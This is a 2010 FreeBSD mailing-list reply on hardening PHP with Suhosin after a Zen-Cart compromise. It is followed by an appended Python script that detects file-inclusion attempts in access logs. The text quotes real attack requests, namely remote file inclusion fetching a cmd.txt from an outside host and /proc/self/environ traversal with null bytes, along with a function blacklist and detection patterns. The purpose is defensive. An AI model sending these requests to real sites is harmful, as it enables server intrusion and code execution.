Date:      Mon, 1 Feb 2010 19:19:46 +0200
From:      Bogdan Webb <bogdan@pgn.ro>
To:        freebsd-questions@freebsd.org
Subject:   Re: Server compromised Zen-Cart "record company" Exploit
Message-ID:  <c81e6afd1002010919l636369e4sa30d87e00e87a9b9@mail.gmail.com>
In-Reply-To: <alpine.BSF.2.00.1002011107080.28912@mail.pil.net>
References:  <alpine.BSF.2.00.1001301829060.97440@mail.pil.net> <alpine.BSF.2.00.1002011107080.28912@mail.pil.net>

Indeed it's pretty tricky with safe_mode, like for certain I know that a
version of a popular r57 shell had safe_mode bypass - I was stunned to check
the shell myself on my server... and I was thinking that safe_mode is
enough... (+ I was using the Suhosin patch *which in fact does nothing
regarding straightening the php) then I came over Suhosin the addon (which
on my BSD with lighttpd it could be loaded only using Zend framework... for
unknown reasons to me) the Suhosin was configured to blacklist some basic
commands that allow php to directly run shell commands:

suhosin.executor.func.blacklist =
"proc_nice,shell_exec,show_source,symlink,system,dl,highlight_file,ini_alter,ini_restore,openlog,passthru,exec"

thus even if hackers find bugs in some php apps it would be harder to get a
shell... I say harder because it's impossible to prevent that - there are
MySQL ways to get shell and so on ... so it's not 100% foolproof, but it's

Here are some examples of how Suhosin alerts on the attacks:

Jan  2 02:17:00 pgn suhosin[75216]: ALERT - tried to register forbidden
variable '_SERVER[DOCUMENT_ROOT]' through GET variables (attacker
'91.121.75.82', file '/usr/home/wwww/pgnlinks/index.php')

Dec 16 23:43:36 pgn suhosin[87560]: ALERT - function within blacklist
called: shell_exec() (attacker '86.122.161.162', file
'/usr/home/wwww/pvpwww/junkforum/Sources/Subs.php', line 3531)

*note - these are logs from /var/log/messages and the last message is a
false positive (I think it's called that way); it's a basic function of SMF
board to check the DNS with a Linux command, but I just wanted to point out
how it handles the blacklist...

Here is more detailed info regarding attacks (attempts) stored in the
web server's log file (in my case lighttpd):

2010-01-19 02:21:53: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL
chars not allowed within request variables - dropped variable 'list'
(attacker '189.26.208.35', file '/usr/home/wwww/pgnlinks/index.php')
2010-01-19 02:21:54: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL
chars not allowed within request variables - dropped variable 'c' (attacker
'189.26.208.35', file '/usr/home/wwww/pgnlinks/index.php')

189.26.208.35 www.pgn.ro - [19/Jan/2010:02:20:43 +0200] "GET
/index.php?list=http://www.startasurvey.com/cmd/cmd.txt? HTTP/1.1" 302 0 "-"
"Mozilla/3.0 (compatible; Indy Library)"
189.26.208.35 www.pgn.ro - [19/Jan/2010:02:20:43 +0200] "GET /index.php?c=
http://www.startasurvey.com/cmd/cmd.txt? HTTP/1.1" 200 3304 "-" "Mozilla/3.0
(compatible; Indy Library)"
189.26.208.35 www.pgn.ro - [19/Jan/2010:02:21:53 +0200] "GET
/index.php?list=../../../../../../../../../../../../../../../proc/self/environ%00
HTTP/1.1" 200 3307 "-" "Mozilla/3.0 (compatible; Indy Library)"
189.26.208.35 www.pgn.ro - [19/Jan/2010:02:21:54 +0200] "GET
/index.php?c=../../../../../../../../../../../../../../../proc/self/environ%00
HTTP/1.1" 200 3306 "-" "Mozilla/3.0 (compatible; Indy Library)"


My server has safe_mode off - because it's not needed (at least in my mind... I
might be mistaken) and check out the phpinfo.php file I've got and see the
Suhosin settings....

stay safe!
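The two request shapes in the access log above (a remote URL handed to a query parameter, and a /proc/self/environ traversal ending in %00) can be picked out of a lighttpd access log automatically. The following is an added example written for this thread, not code from the original message or from Suhosin; the log lines are constructed, using documentation-range IPs and the hypothetical vhost shop.example.test.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines in lighttpd's default (NCSA combined) format,
# modelled on the three request types in the message: a remote-URL include attempt,
# a /proc/self/environ traversal with a trailing %00, and an ordinary request.
SAMPLE_LOG = """\
198.51.100.7 shop.example.test - [19/Jan/2010:02:20:43 +0200] "GET /index.php?list=http://evil.example/cmd/cmd.txt? HTTP/1.1" 302 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
198.51.100.7 shop.example.test - [19/Jan/2010:02:21:53 +0200] "GET /index.php?list=../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3307 "-" "Mozilla/3.0 (compatible; Indy Library)"
203.0.113.9 shop.example.test - [19/Jan/2010:02:22:10 +0200] "GET /index.php?list=news&page=2 HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# client vhost ident [time] "method target proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
REMOTE_SCHEME = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def classify_value(value):
    """Return the suspicious traits of one already-URL-decoded parameter value."""
    reasons = []
    if REMOTE_SCHEME.match(value):
        reasons.append("remote-file-inclusion")   # include()/require() fed a URL
    if "../" in value or "..\\" in value:
        reasons.append("path-traversal")
    if "\x00" in value:
        reasons.append("null-byte")               # %00 to cut off an appended suffix
    if "/proc/self/environ" in value:
        reasons.append("proc-environ-read")       # classic LFI target (reads the CGI env)
    return reasons

def scan_access_log(text):
    """Flag every request whose query parameters look like file-inclusion attempts."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                              # not a combined-format line; skip
        query = urlsplit(m["target"]).query
        # parse_qsl percent-decodes once, so %00 becomes a real NUL byte here
        for name, value in parse_qsl(query, keep_blank_values=True):
            reasons = classify_value(value)
            if reasons:
                findings.append({"ip": m["ip"], "time": m["time"], "param": name,
                                 "status": int(m["status"]), "reasons": reasons})
    return findings
```

Calling scan_access_log(SAMPLE_LOG) returns two findings, one per hostile request; the traversal line answered with a 200 and a non-zero body is the one that warrants immediate follow-up, since the include most likely succeeded.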
